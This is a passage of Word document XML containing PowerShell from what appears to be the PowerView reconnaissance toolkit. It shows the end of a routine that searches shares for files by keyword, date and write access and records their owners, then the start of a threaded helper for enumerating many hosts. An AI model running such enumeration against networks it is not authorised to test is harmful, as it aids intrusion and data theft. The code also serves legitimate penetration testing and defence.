      </w:r>
    </w:p>
    <w:p w14:paraId="5621C1EA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'Include' = $SearchTerms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819055F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            'ErrorAction' = 'SilentlyContinue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F005C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A44DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23D09426" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get-ChildItem @SearchArgs | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D042C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose $_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379DD4DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # check if we're excluding folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBC13B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if(!$ExcludeFolders -or !$_.PSIsContainer) {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130CEF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688003EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($LastAccessTime -or $LastWriteTime -or $CreationTime) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223E8DB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($LastAccessTime -and ($_.LastAccessTime -gt $LastAccessTime)) {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A8C4CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif($LastWriteTime -and ($_.LastWriteTime -gt $LastWriteTime)) {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1392722C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                elseif($CreationTime -and ($_.CreationTime -gt $CreationTime)) {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7432ADF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5748CE78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F25C79C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07676260" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # filter for write access (if applicable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435A0EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if((-not $CheckWriteAccess) -or (Invoke-CheckWrite -Path $_.FullName)) {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386B1902" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        } | Select-Object FullName,@{Name='Owner';Expression={(Get-Acl $_.FullName).Owner}},LastAccessTime,LastWriteTime,CreationTime,Length | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAB400F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # check if we're outputting to the pipeline or an output file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C57396" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($OutFile) {Export-PowerViewCSV -InputObject $_ -OutFile $OutFile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF03050" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            else {$_}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457A3957" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF694FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABEE50A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2865616A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    end {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456DC80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($UsePSDrive -and $RandDrive) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2355EECC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Removing temp PSDrive $RandDrive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B6C8D9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Get-PSDrive -Name $RandDrive -ErrorAction SilentlyContinue | Remove-PSDrive -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29440446" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3164CA4C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02B1896C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF1B678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26F20951" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2E5C2C3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2119E266" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F2C68" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t># 'Meta'-functions start below</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56278B50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46186DE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>########################################################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C2735" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48B8E742" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Invoke-ThreadedFunction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788CA1FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Helper used by any threaded host enumeration functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462F975E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACEC1FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F52D1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,Mandatory=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D013A3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598E4235" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418EDDF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20E65075" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=1,Mandatory=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA9586B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [System.Management.Automation.ScriptBlock]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B1D864" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $ScriptBlock,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC72DCD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5A34D12A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=2)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374911DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Hashtable]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093F7B25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ScriptParameters,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6363F9D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0D742D7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D019E00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0217496F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads = 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5268DC39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1BD559B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DEA3C1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoImports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D15C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C786381" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="418E3643" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C47F7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="185B750B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A5D4EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE66F32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4644CEF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="58C4D908" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Total number of hosts: $($ComputerName.count)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C6F90D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="764D25D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Adapted from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B172D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #   http://powershell.org/wp/forums/topic/invpke-parallel-need-help-to-clone-the-current-runspace/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8F4B65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SessionState = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C1865" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SessionState.ApartmentState = [System.Threading.Thread]::CurrentThread.GetApartmentState()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30507EBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1B1AB3F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # import the current session state's variables and functions so the chained PowerView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A75B628" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        #   functionality can be used by the threaded blocks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DA10AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$NoImports) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE5ECB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0A475017" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # grab all the current variables for this runspace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD83AA0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $MyVars = Get-Variable -Scope 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4DF5C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4FDA8B44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # these Variables are added by Runspace.Open() Method and produce Stop errors if you add them twice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1D7D7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $VorbiddenVars = @("?","args","ConsoleFileName","Error","ExecutionContext","false","HOME","Host","input","InputObject","MaximumAliasCount","MaximumDriveCount","MaximumErrorCount","MaximumFunctionCount","MaximumHistoryCount","MaximumVariableCount","MyInvocation","null","PID","PSBoundParameters","PSCommandPath","PSCulture","PSDefaultParameterValues","PSHOME","PSScriptRoot","PSUICulture","PSVersionTable","PWD","ShellId","SynchronizedHash","true")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C639FFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34FD919D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Add Variables from Parent Scope (current runspace) into the InitialSessionState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC812AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach($Var in $MyVars) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8113C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                if($VorbiddenVars -NotContains $Var.Name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE04AE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SessionState.Variables.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Var.name,$Var.Value,$Var.description,$Var.options,$Var.attributes))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA64DB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFF6DF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152AA7CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20741BBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # Add Functions from current runspace to the InitialSessionState</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215931AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach($Function in (Get-ChildItem Function:)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D371AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $SessionState.Commands.Add((New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList $Function.Name, $Function.Definition))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC9353" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6CA7B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A61FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F3DBFDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # threading adapted from</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF6476A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # https://github.com/darkoperator/Posh-SecMod/blob/master/Discovery/Discovery.psm1#L407</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491EAE4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        #   Thanks Carlos!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3911EFD5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="002A7DC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # create a pool of maxThread runspaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7927BBAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Pool = [runspacefactory]::CreateRunspacePool(1, $Threads, $SessionState, $Host)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04576572" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Pool.Open()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB6B81" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27B80A55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $method = $null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7129E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach ($m in [PowerShell].GetMethods() | Where-Object { $_.Name -eq "BeginInvoke" }) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4260961F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $methodParameters = $m.GetParameters()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6C06FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if (($methodParameters.Count -eq 2) -and $methodParameters[0].Name -eq "input" -and $methodParameters[1].Name -eq "output") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61550F0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $method = $m.MakeGenericMethod([Object], [Object])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F11DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CCD7E1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648273A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9ADDB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7F38F42B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jobs = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC2077" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51763F09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="405D12E3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    process {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAA6767" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D4DCB90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        ForEach ($Computer in $ComputerName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C87116D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74B472B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # make sure we get a server name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0BFF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($Computer -ne '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0AA6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # Write-Verbose "[*] Enumerating server $Computer ($($Counter+1) of $($ComputerName.count))"</w:t>
      </w:r>
    </w:p>
